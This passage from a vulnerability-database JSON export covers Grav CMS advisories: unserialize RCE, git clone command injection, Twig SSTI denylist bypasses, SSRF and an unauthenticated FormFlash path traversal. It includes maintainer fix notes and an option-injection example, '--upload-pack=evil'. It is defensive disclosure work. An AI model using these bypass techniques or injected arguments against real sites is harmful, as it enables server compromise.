(via any file write primitive), they get object injection → RCE.\n\n**3. Unsafe unserialize() in Session (High)**\n\n`system/src/Grav/Common/Session.php:116` — same `allowed_classes => true` pattern on session data. Lower severity since session storage is typically more restricted.\n\n**4. Command injection in git clone (Critical)**\n\n`system/src/Grav/Console/Cli/InstallCommand.php:150` — only `$this->destination` uses `escapeshellarg()`. The `$data['branch']`, `$data['url']`, and `$data['path']` variables go directly into the shell command without escaping. Admin-accessible via plugin/theme installation.\n\n**5. SSTI blocklist bypass (High)**\n\n`system/src/Grav/Common/Security.php:267-286` — `cleanDangerousTwig()` blocks `twig_array_map` and `twig_array_filter` but not `twig_array_reduce`. Also missing `file_get_contents` and `fwrite` from the dangerous function blocklist. An attacker who can inject Twig templates can bypass the security filter.\n\nAll five are independently exploitable. The unserialize issues are the most concerning since they don't require admin access if there's any file write primitive.\n\n— ProScan AppSec | proscan.one\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`c66dfeb5f`](https://github.com/getgrav/grav/commit/c66dfeb5f) (items #1, #2, #3, #4) and commit [`38685ac25`](https://github.com/getgrav/grav/commit/38685ac25) + [`c66dfeb5f`](https://github.com/getgrav/grav/commit/c66dfeb5f) (item #5) — ships in **2.0.0-beta.2**.\n\nAll five vectors addressed:\n\n1. **Scheduler\\JobQueue unsafe unserialize** — `serialized_job` now carries a sibling `serialized_job_hmac` signed with `Security::getNonceKey()`. `reconstructJob` refuses to unserialize an item whose HMAC is missing/mismatched and falls through to the safe structured-fields rebuild. A tampered queue file can no longer smuggle a forged `Job` for direct RCE via `Job::exec → call_user_func_array`. \n → [`system/src/Grav/Common/Scheduler/JobQueue.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Scheduler/JobQueue.php)\n\n2. **FileCache unsafe unserialize** — same HMAC-integrity approach; see separate GHSA-gwfr-jfjf-92vv. \n → [`system/src/Grav/Framework/Cache/Adapter/FileCache.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Framework/Cache/Adapter/FileCache.php)\n\n3. **Session::getFlashObject unsafe unserialize** — payload now wrapped in a `v2|<hmac>|<serialized>` envelope; legacy/forged envelopes return null instead of triggering `unserialize`. \n → [`system/src/Grav/Common/Session.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Session.php)\n\n4. **InstallCommand `git clone` shell injection** — `branch`, `url`, and `path` values read from `user/.dependencies` are now passed through `escapeshellarg`, with a `--` separator before url/path to block option-injection (e.g. `--upload-pack=evil`). \n → [`system/src/Grav/Console/Cli/InstallCommand.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Console/Cli/InstallCommand.php)\n\n5. **SSTI blocklist bypass** — `twig_array_reduce` (the specific name called out) plus `twig_array_some` and `twig_array_every` added to `cleanDangerousTwig`'s `CALLABLE_DANGEROUS_NAMES` alongside the existing `twig_array_map`/`filter`. More importantly, the new Twig content sandbox in 2.0.0-beta.2 blocks this class of attack at a different layer — see the sandbox work in [`38685ac25`](https://github.com/getgrav/grav/commit/38685ac25). \n → [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php)\n\n**Tests:**\n- [`tests/unit/Grav/Common/Security/UnserializeIntegritySecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/UnserializeIntegritySecurityTest.php) — 8 cases covering JobQueue + Session HMAC integrity.\n- [`tests/unit/Grav/Common/Security/FileCacheSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/FileCacheSecurityTest.php).\n- [`tests/unit/Grav/Common/Security/CleanDangerousTwigTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/CleanDangerousTwigTest.php) — new `twig_array_*` entries in `providerCallbackFunctions`.", "references": [ { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-vj3m-2g9h-vm4p", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-vj3m-2g9h-vm4p" }, { "reference_url": "https://github.com/advisories/GHSA-vj3m-2g9h-vm4p", "reference_id": "GHSA-vj3m-2g9h-vm4p", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-vj3m-2g9h-vm4p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "GHSA-vj3m-2g9h-vm4p" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rcyu-yu31-n7gu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49444?format=api", "vulnerability_id": "VCID-rj4b-8dyu-juen", "summary": "Grav may be vulnerable to SSRF attack via Twig Templates\nIn grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66844", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17867", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66844" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/Yohane-Mashiro/grav_cve/issues/2", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-16T15:32:54Z/" } ], "url": "https://github.com/Yohane-Mashiro/grav_cve/issues/2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66844", "reference_id": "CVE-2025-66844", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66844" }, { "reference_url": "https://github.com/advisories/GHSA-729w-j79f-2c34", "reference_id": "GHSA-729w-j79f-2c34", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-729w-j79f-2c34" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/907178?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1" } ], "aliases": [ "CVE-2025-66844", "GHSA-729w-j79f-2c34" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rj4b-8dyu-juen" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45428?format=api", "vulnerability_id": "VCID-rsc3-r7fy-pkca", "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a file-based Web platform. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34253", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02104", "scoring_system": "epss", "scoring_elements": "0.84421", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34253" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/" } ], "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190" }, { "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec" }, { "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/" } ], "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b" }, { "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8" }, { "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5" }, { "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66" }, { "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/" } ], "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/" }, { "reference_url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/" } ], "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34253", "reference_id": "CVE-2023-34253", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34253" }, { "reference_url": "https://github.com/advisories/GHSA-j3v8-v77f-fvgm", "reference_id": "GHSA-j3v8-v77f-fvgm", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-j3v8-v77f-fvgm" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm", "reference_id": "GHSA-j3v8-v77f-fvgm", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api", "purl": "pkg:composer/getgrav/grav@1.7.42", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ps5-3k43-p3fa" }, { "vulnerability": "VCID-4a2z-37a3-2qaw" }, { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-7jaz-7xjc-kka1" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-a8y8-y4zt-zqbv" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-bwvg-jg4z-nyhp" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-ru55-uj84-p3dr" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-yh73-zyju-vqge" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" }, { "vulnerability": "VCID-zg5t-uqx2-87fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42" } ], "aliases": [ "CVE-2023-34253", "GHSA-j3v8-v77f-fvgm" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rsc3-r7fy-pkca" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45692?format=api", "vulnerability_id": "VCID-ru55-uj84-p3dr", "summary": "Return of Wrong Status Code\nGrav is a file-based Web-platform built in PHP. Grav is subject to a server side template injection (SSTI) vulnerability. The fix for another SSTI vulnerability using `|map`, `|filter` and `|reduce` twigs implemented in the commit `71bbed1` introduces bypass of the denylist due to incorrect return value from `isDangerousFunction()`, which allows to execute the payload prepending double backslash (`\\\\`). The `isDangerousFunction()` check in version 1.7.42 and onwards retuns `false` value instead of `true` when the `\\` symbol is found in the `$name`. This vulnerability can be exploited if the attacker has access to: 1. an Administrator account, or 2. a non-administrator, user account that has Admin panel access and Create/Update page permissions. A fix for this vulnerability has been introduced in commit `b4c6210` and is included in release version `1.7.42.2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-37897", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30282", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-37897" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/" } ], "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b" }, { "reference_url": "https://github.com/getgrav/grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/" } ], "url": "https://github.com/getgrav/grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37897", "reference_id": "CVE-2023-37897", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37897" }, { "reference_url": "https://github.com/advisories/GHSA-9436-3gmp-4f53", "reference_id": "GHSA-9436-3gmp-4f53", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9436-3gmp-4f53" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53", "reference_id": "GHSA-9436-3gmp-4f53", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/662910?format=api", "purl": "pkg:composer/getgrav/grav@1.7.42.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ps5-3k43-p3fa" }, { "vulnerability": "VCID-4a2z-37a3-2qaw" }, { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-7jaz-7xjc-kka1" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-a8y8-y4zt-zqbv" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-bwvg-jg4z-nyhp" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-yh73-zyju-vqge" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" }, { "vulnerability": "VCID-zg5t-uqx2-87fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/66208?format=api", "purl": "pkg:composer/getgrav/grav@1.7.42%2B2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42%252B2" } ], "aliases": [ "CVE-2023-37897", "GHSA-9436-3gmp-4f53" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ru55-uj84-p3dr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95281?format=api", "vulnerability_id": "VCID-seer-x4fd-e7ge", "summary": "Grav has Unauthenticated Path Traversal & Arbitrary File Write in its FormFlash component\n# Vulnerability Report: Grav CMS Unauthenticated Path Traversal & Arbitrary File Write\n\n**[ZERO-DAY] Unauthenticated Path Traversal leading to Arbitrary Directory Creation and Configuration Injection**\n\n## Summary\n\nGrav CMS (v1.7.49.5 and latest development source) is vulnerable to a Zero-Day Path Traversal vulnerability within the FormFlash core component. By manipulating the session_id (passed as `__form-flash-id` in POST requests), an unauthenticated attacker can traverse the filesystem to create arbitrary directories and write an `index.yaml` file containing attacker-controlled data.\n\nThis vulnerability can lead to unauthorized modification of application behavior, potential data integrity issues, and service disruption in production environments.\n\n## Affected Component\n\n- Versions: Confirmed in Grav v1.7.49.5 (latest stable) and the latest development source (March 2026).\n- Class: `Grav\\Framework\\Form\\FormFlash`\n- Method: `__construct()` / `getTmpDir()`\n- Parameter: `session_id` (Mapped to `__form-flash-id` in POST requests)\n\n## Vulnerability Details\n\nThe FormFlash class is used to persist form data across redirects. It constructs a temporary storage path using the provided session_id. The path construction logic in the latest source:\n\n```php\n$folder = $config['folder'] ?? ($this->sessionId ? 'tmp://forms/' . $this->sessionId : '');\n$this->folder = $folder && $locator->isStream($folder) ? $locator->findResource($folder, true, 